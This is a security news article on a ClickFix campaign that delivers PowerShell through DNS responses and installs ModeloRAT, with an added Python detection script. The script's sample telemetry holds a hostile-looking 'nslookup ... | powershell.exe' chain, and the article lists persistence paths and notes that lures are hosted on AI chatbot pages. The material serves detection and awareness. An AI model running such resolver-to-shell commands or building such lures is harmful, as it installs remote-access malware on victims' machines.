New ClickFix Attack Uses DNS to Deliver PowerShell Payloads
Researchers at Microsoft have uncovered a novel ClickFix campaign in which threat actors are leveraging DNS queries to deliver malware, marking the first known use of DNS as a delivery channel in these social engineering attacks.
ClickFix attacks trick users into manually executing commands under the pretense of fixing errors, installing updates, or enabling functionality. This new variant represents a significant evolution in the technique.
How the DNS-Based ClickFix Attack Works
In this campaign, victims are instructed to run an nslookup command that queries an attacker-controlled DNS server instead of the system’s default DNS.
- The DNS server responds with a malicious PowerShell script embedded in the “NAME:” field of the DNS response.
- The victim’s system executes the script via the Windows command interpreter (cmd.exe), initiating the malware infection.
This method allows attackers to deliver second-stage payloads dynamically while blending in with normal DNS traffic, making detection more difficult.
Although the specific lure used to trick users is unclear, Microsoft notes that the command may be executed via the Windows Run dialog box. The DNS-based response then triggers the download of additional malware components.
Malware Components and Persistence
The payload ultimately delivers a ZIP archive containing a Python runtime executable and malicious scripts that perform reconnaissance on the infected system and network.
To maintain persistence, the malware creates:
- %APPDATA%\WPy64-31401\python\script.vbs
- %STARTUP%\MonitoringService.lnk, a shortcut that launches the VBScript at startup
The final stage installs ModeloRAT, a remote access trojan (RAT) that gives attackers full control over compromised systems.
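The two observable stages described above, the resolver call whose output is handed to a shell and the persistence artifacts that follow, are what a hunting team would look for first. The following detection is an added example written for this page, not Microsoft's or any vendor's logic: it runs two heuristics over constructed tab-separated telemetry lines in the shape a SIEM hands back after parsing process-create and file-create events. The nslookup rule fires only when a shell interpreter appears after the resolver call in the same command line, so an ordinary `cmd /c nslookup host server` is not flagged; the explicit server argument, the page's "instead of the system's default DNS", is reported when present. The persistence rule assumes %APPDATA% and the Startup folder expand to their per-user defaults; the 203.0.113.10 address, the `.invalid` name and the user name are constructed.

```python
"""Hunting rules for the DNS-delivered ClickFix chain (added example).

Input lines are constructed, tab-separated telemetry:
    event<TAB>image<TAB>command line (ProcessCreate) or target path (FileCreate)

  Rule 1  nslookup output consumed by cmd/powershell later in the same command
          line; an explicit DNS server argument is captured when present.
  Rule 2  the persistence paths the page lists, with %APPDATA% and the Startup
          folder expanded to their per-user defaults (assumption).
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


# nslookup [options] NAME [SERVER]; argument tokens stop at whitespace, pipes,
# ampersands, quotes and parentheses so a chained command is not swallowed.
NSLOOKUP_RE = re.compile(
    r"""\bnslookup(?:\.exe)?\s+(?:-\S+\s+)*(?P<name>[^\s|&'"()]+)(?:\s+(?P<server>[^\s|&'"()]+))?""",
    re.IGNORECASE,
)
SHELL_RE = re.compile(r"\b(?:powershell|pwsh|cmd)(?:\.exe)?\b", re.IGNORECASE)

# Persistence artifacts from the page: %APPDATA%\WPy64-<ver>\python\<x>.vbs and a
# .lnk in the per-user Startup folder (default expansions assumed).
VBS_RE = re.compile(r"\\AppData\\Roaming\\WPy64-[^\\]+\\python\\[^\\]+\.vbs$", re.IGNORECASE)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)


def nslookup_feeds_shell(cmdline: str) -> Optional[str]:
    """Describe the chain if nslookup's output is handed to a shell, else None."""
    m = NSLOOKUP_RE.search(cmdline)
    if m is None:
        return None
    # Only a shell *after* the resolver call can consume its output; a leading
    # 'cmd /c nslookup ...' with nothing following is an ordinary lookup.
    if SHELL_RE.search(cmdline[m.end():]) is None:
        return None
    server = m.group("server") or "<system default>"
    return f"nslookup for {m.group('name')} via {server} piped into shell"


def persistence_artifact(path: str) -> Optional[str]:
    """Return the rule name if the created file matches a known persistence path."""
    if VBS_RE.search(path):
        return "clickfix-persistence-vbs"
    if STARTUP_LNK_RE.search(path):
        return "clickfix-persistence-startup-lnk"
    return None


def hunt(lines) -> List[Finding]:
    """Apply both rules to telemetry lines and collect findings in input order."""
    findings: List[Finding] = []
    for line in lines:
        event, image, detail = line.split("\t", 2)
        if event == "ProcessCreate":
            why = nslookup_feeds_shell(detail)
            if why:
                findings.append(Finding("dns-clickfix-nslookup-chain", image, why))
        elif event == "FileCreate":
            rule = persistence_artifact(detail)
            if rule:
                findings.append(Finding(rule, image, detail))
    return findings


# Constructed telemetry: one chained lookup, two benign resolver uses, the two
# persistence writes from the page, and one ordinary Startup-folder file.
SAMPLE_EVENTS = [
    "ProcessCreate\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c nslookup example.invalid 203.0.113.10 | powershell.exe -NoProfile",
    "ProcessCreate\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c nslookup -type=MX example.com 8.8.8.8",
    "ProcessCreate\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -c Resolve-DnsName example.com",
    "FileCreate\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tC:\\Users\\alice\\AppData\\Roaming\\WPy64-31401\\python\\script.vbs",
    "FileCreate\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tC:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MonitoringService.lnk",
    "FileCreate\tC:\\Windows\\explorer.exe\tC:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

The nslookup rule deliberately does not require an explicit server: resolver output flowing into a shell is anomalous on its own, and requiring the server argument would miss a variant that uses the system resolver. Tune the path patterns to the actual %APPDATA% and Startup locations in your environment if roaming profiles or folder redirection change them.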
Unlike previous ClickFix campaigns, which primarily retrieved payloads via HTTP, this variant demonstrates how attackers can use DNS for command-and-control and staging of malware.
Evolution of ClickFix Attacks
ClickFix campaigns have rapidly evolved over the past year, experimenting with new delivery techniques, operating system targets, and payload types. Key trends include:
- Executing PowerShell or shell commands directly on target systems
- Using DNS queries to dynamically deliver payloads
- Leveraging LLM platforms such as ChatGPT, Grok, and Claude Artifact pages to promote fake guides
- Hijacking Microsoft accounts via OAuth apps (e.g., ConsentFix) to bypass multi-factor authentication
- Deploying JavaScript in browsers to hijack web applications or cryptocurrency transactions
These developments demonstrate attackers’ creativity in expanding social engineering tactics beyond traditional malware delivery channels.
Why This Attack Is Concerning
This DNS-based ClickFix attack shows how threat actors:
- Can evade traditional security measures by blending traffic with legitimate DNS queries
- Dynamically update payloads without requiring direct web downloads
- Combine social engineering with technical tricks to compromise users across platforms
- Target both local system security and web-based applications
As ClickFix attacks evolve, users are advised to exercise extreme caution before running commands on their devices, particularly when instructed by unverified guides or sponsored search results.
“This DNS-based ClickFix attack is a serious warning for Windows users. Never run commands from unverified guides or sources, as attackers can deliver malware like ModeloRAT through seemingly harmless DNS queries.”